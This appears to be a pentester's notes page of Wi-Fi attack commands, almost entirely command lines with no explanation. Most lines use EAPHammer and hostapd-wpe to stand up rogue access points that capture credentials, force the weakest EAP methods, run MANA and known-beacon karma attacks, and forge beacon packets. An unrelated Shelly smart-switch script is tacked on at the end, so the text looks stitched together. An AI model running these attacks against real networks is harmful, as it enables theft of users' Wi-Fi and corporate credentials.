./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Shelly.addEventHandler(function (event) {
if (event.component === "switch:0" && event.info.state) {
Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
}
});